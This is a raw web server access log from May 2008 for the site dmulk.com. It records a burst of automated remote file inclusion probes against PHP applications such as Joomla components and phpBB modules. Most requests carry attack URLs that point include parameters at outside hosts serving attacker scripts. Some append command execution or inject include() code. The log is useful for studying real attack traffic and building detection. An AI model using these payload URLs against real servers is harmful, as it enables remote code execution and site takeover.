70.84.98.162 - - [29/May/2008:09:25:16 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.151.242 - - [29/May/2008:09:25:17 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:09:25:19 -0700] "GET /logs/send_reminders.php?includedir=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [29/May/2008:09:25:20 -0700] "GET /send_reminders.php?includedir=http://www.geocities.com/cahayaindra/queen?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.106.68 - - [29/May/2008:09:25:22 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.98.162 - - [29/May/2008:09:25:22 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.120.178 - - [29/May/2008:09:25:28 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.208.13.87 - - [29/May/2008:09:25:43 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_newsfeeds&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
216.167.156.20 - - [29/May/2008:09:26:26 -0700] "GET /logs//bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [29/May/2008:09:26:26 -0700] "GET //bb_usage_stats/include/bb_usage_stats.php?phpbb_root_path=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:09:27:00 -0700] "GET /logs/access.log//include/lib.inc.php?site_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:09:27:00 -0700] "GET //include/lib.inc.php?site_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.223.113.2 - - [29/May/2008:09:27:01 -0700] "GET /logs//include/lib.inc.php?site_path=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.130 - - [29/May/2008:09:27:35 -0700] "GET /logs/access_080201.log//index.php?pagina=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.130 - - [29/May/2008:09:27:36 -0700] "GET //index.php?pagina=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.130 - - [29/May/2008:09:27:36 -0700] "GET /logs//index.php?pagina=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.53.240.146 - - [29/May/2008:09:27:37 -0700] "GET /logs/access.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://love-ma2.t35.com/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.113.226 - - [29/May/2008:09:27:38 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/ViewModule.class.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:09:27:50 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:09:27:50 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:09:27:50 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.113.226 - - [29/May/2008:09:27:51 -0700] "GET /errors.php?errorhttp://www.jjkosta.org/kbs/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
74.55.113.226 - - [29/May/2008:09:27:51 -0700] "GET /logs/errors.php?errorhttp://www.jjkosta.org/kbs/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
67.18.151.242 - - [29/May/2008:09:27:57 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/ViewModule.class.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [29/May/2008:09:27:58 -0700] "GET //administrator/components/com_joomla-visites/core/include/ViewModule.class.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
219.94.133.251 - - [29/May/2008:09:28:03 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.26.122 - - [29/May/2008:09:28:06 -0700] "GET /logs/access_080309.log//index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.villeneuvedolmes.com/cmsimple/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [29/May/2008:09:28:08 -0700] "GET //index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.villeneuvedolmes.com/cmsimple/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.26.122 - - [29/May/2008:09:28:14 -0700] "GET /logs//index.php?option=com_joomap&Itemid=&mosConfig_absolute_path=http://www.villeneuvedolmes.com/cmsimple/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:09:28:36 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:09:28:36 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.26.122 - - [29/May/2008:09:28:38 -0700] "GET /logs/access_080308.log//sitemap.php?mosConfig_admin_path=http://www.villeneuvedolmes.com/cmsimple/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.208.13.87 - - [29/May/2008:09:29:01 -0700] "GET /logs/access_071214.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_newsfeeds&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.13.87 - - [29/May/2008:09:29:02 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_newsfeeds&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
74.208.13.87 - - [29/May/2008:09:29:02 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_newsfeeds&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.59.25.3 - - [29/May/2008:09:29:22 -0700] "GET /logs/access_080218.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.59.25.3 - - [29/May/2008:09:29:22 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.59.25.3 - - [29/May/2008:09:29:22 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
92.48.65.154 - - [29/May/2008:09:29:27 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/ViewModule.class.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.65.154 - - [29/May/2008:09:29:28 -0700] "GET //administrator/components/com_joomla-visites/core/include/ViewModule.class.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.118.97.147 - - [29/May/2008:09:29:52 -0700] "GET /logs/access_080310.log/index.php?_REQUEST=&_REQUEST%5boption%5d=com_galleria&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.193.201.57 - - [29/May/2008:09:30:13 -0700] "GET /usesubform[1]=1&usesubform[2]=1&subform[1][redirect]=%22.$ARGV[2].%22&subform[1][cXIb8O3]=http://www.geocities.com/refusedlink/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.75" "www.dmulk.com"
64.13.224.83 - - [29/May/2008:09:30:21 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.science-lausd.net///upload/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
64.13.224.83 - - [29/May/2008:09:30:23 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.science-lausd.net///upload/test.txt? HTTP/1.1" 200 4139 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
69.89.22.130 - - [29/May/2008:09:30:45 -0700] "GET /logs/access_080201.log//index.php?pagina=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.130 - - [29/May/2008:09:30:46 -0700] "GET //index.php?pagina=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.22.130 - - [29/May/2008:09:30:46 -0700] "GET /logs//index.php?pagina=http://www.yogyacardus.com/var/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.18.151.242 - - [29/May/2008:09:31:26 -0700] "GET /logs/access_080120.log//administrator/components/com_joomla-visites/core/include/ViewModule.class.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
89.108.67.119 - - [29/May/2008:09:31:37 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.119 - - [29/May/2008:09:31:37 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.9.49 - - [29/May/2008:09:31:43 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.51.115 - - [29/May/2008:09:31:47 -0700] "GET / HTTP/1.0" 200 11586 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
66.232.156.135 - - [29/May/2008:09:32:09 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
219.94.133.251 - - [29/May/2008:09:32:18 -0700] "GET /logs/access_080305.log/admin/classes/TplLoad.php?full_path_to_public_program=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.133.251 - - [29/May/2008:09:32:18 -0700] "GET /logs/admin/classes/TplLoad.php?full_path_to_public_program=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
90.158.114.6 - - [29/May/2008:09:32:37 -0700] "GET /logs/access.log/claroline/inc/claro_init_header.inc.php?includePath=http://www.bestpaket.ru/netcat//dump/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
90.158.114.6 - - [29/May/2008:09:32:38 -0700] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://www.bestpaket.ru/netcat//dump/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
74.86.101.159 - - [29/May/2008:09:32:39 -0700] "GET /logs/admin/classes/TplLoad.php?full_path_to_public_program=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.86.101.159 - - [29/May/2008:09:32:40 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
218.94.38.182 - - [29/May/2008:09:32:58 -0700] "GET //cms/front_content.php?idcat=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.94.133.251 - - [29/May/2008:09:32:59 -0700] "GET /logs/access_080315.log/admin/classes/TplLoad.php?full_path_to_public_program=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.166.231 - - [29/May/2008:09:33:01 -0700] "GET /logs/errors.php?errorhttp://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.59.25.3 - - [29/May/2008:09:33:02 -0700] "GET /logs/access_080126.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.166.231 - - [29/May/2008:09:33:03 -0700] "GET /errors.php?errorhttp://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [29/May/2008:09:33:03 -0700] "GET /logs/errors.php?errorhttp://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [29/May/2008:09:33:03 -0700] "GET /errors.php?errorhttp://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.47.204.44 - - [29/May/2008:09:33:05 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.55.53.226 - - [29/May/2008:09:33:25 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.madnessguild.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.106.68 - - [29/May/2008:09:33:29 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [29/May/2008:09:33:29 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.55.53.226 - - [29/May/2008:09:33:32 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.madnessguild.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.106.68 - - [29/May/2008:09:33:39 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [29/May/2008:09:33:39 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.freewebs.com/chadalua/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.59.25.3 - - [29/May/2008:09:33:42 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.208.13.87 - - [29/May/2008:09:34:31 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_virtuemart&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 200 50 "-" "libwww-perl/5.803" "www.dmulk.com"
216.120.241.242 - - [29/May/2008:09:35:56 -0700] "GET /logs/access_080118.log/classes/core/language.php?rootdir=http://8-p.ru/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/May/2008:09:35:56 -0700] "GET /classes/core/language.php?rootdir=http://8-p.ru/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/May/2008:09:35:56 -0700] "GET /logs/classes/core/language.php?rootdir=http://8-p.ru/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.200.228.241 - - [29/May/2008:09:36:05 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_virtuemart&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 200 50 "-" "libwww-perl/5.810" "www.dmulk.com"
216.167.156.20 - - [29/May/2008:09:36:08 -0700] "GET /logs//index.php?place=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.167.156.20 - - [29/May/2008:09:36:11 -0700] "GET //index.php?place=http://www.mondocitta.net/.htaccess_/id3.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
64.72.119.227 - - [29/May/2008:09:36:30 -0700] "GET /logs/access_080201.log//index.php?pagina=http://imanicm.com/webcalendar/includes/readme? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.72.119.227 - - [29/May/2008:09:36:32 -0700] "GET //index.php?pagina=http://imanicm.com/webcalendar/includes/readme? HTTP/1.1" 200 11606 "-" "libwww-perl/5.811" "www.dmulk.com"
64.72.119.227 - - [29/May/2008:09:36:32 -0700] "GET /logs//index.php?pagina=http://imanicm.com/webcalendar/includes/readme? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:09:36:35 -0700] "GET /logs/access_080103.log//modules/xfsection/modify.php?dir_module=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:09:36:36 -0700] "GET //modules/xfsection/modify.php?dir_module=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:09:36:36 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.151.242 - - [29/May/2008:09:36:56 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [29/May/2008:09:36:56 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.18.151.242 - - [29/May/2008:09:36:56 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.166.231 - - [29/May/2008:09:37:13 -0700] "GET /logs/access_080118.log/classes/core/language.php?rootdir=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.166.231 - - [29/May/2008:09:37:14 -0700] "GET /classes/core/language.php?rootdir=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
207.58.166.231 - - [29/May/2008:09:37:14 -0700] "GET /logs/classes/core/language.php?rootdir=http://allblackberry.com/all/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.6.223.160 - - [29/May/2008:09:37:27 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.bestpaket.ru/netcat//dump/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.19.120.178 - - [29/May/2008:09:37:27 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.120.178 - - [29/May/2008:09:37:27 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.120.178 - - [29/May/2008:09:37:28 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.120.178 - - [29/May/2008:09:37:28 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.120.178 - - [29/May/2008:09:37:28 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.120.178 - - [29/May/2008:09:37:28 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.59.145.196 - - [29/May/2008:09:37:30 -0700] "GET /logs/access_080201.log//modules/xfsection/modify.php?dir_module=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.106.68 - - [29/May/2008:09:37:30 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [29/May/2008:09:37:30 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.106.68 - - [29/May/2008:09:37:30 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
92.48.65.154 - - [29/May/2008:09:37:48 -0700] "GET /logs/errors.php?errorhttp://www.bestpaket.ru/netcat//dump/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
92.48.65.154 - - [29/May/2008:09:37:48 -0700] "GET /errors.php?errorhttp://www.bestpaket.ru/netcat//dump/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.89.145.82 - - [29/May/2008:09:37:57 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.89.145.82 - - [29/May/2008:09:38:02 -0700] "GET //common/db.php?commonpath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.89.145.82 - - [29/May/2008:09:38:06 -0700] "GET /logs//common/db.php?commonpath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.94.38.182 - - [29/May/2008:09:38:06 -0700] "GET /logs/access_080215.log//cms/front_content.php?idcat=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.94.38.182 - - [29/May/2008:09:38:12 -0700] "GET /logs//cms/front_content.php?idcat=http://www.larisco.com/xxx.txt??????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.214.161.214 - - [29/May/2008:09:38:13 -0700] "GET /forums/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://addictivebehavior.net/i.dat?&list=1&cmd=id HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "www.dmulk.com"
70.84.98.162 - - [29/May/2008:09:38:31 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [29/May/2008:09:38:31 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.98.162 - - [29/May/2008:09:38:32 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.158.238.99 - - [29/May/2008:09:38:38 -0700] "GET /logs/access_080315.log//common/db.php?commonpath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
190.158.238.99 - - [29/May/2008:09:38:39 -0700] "GET //common/db.php?commonpath=http://fuckerboy.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
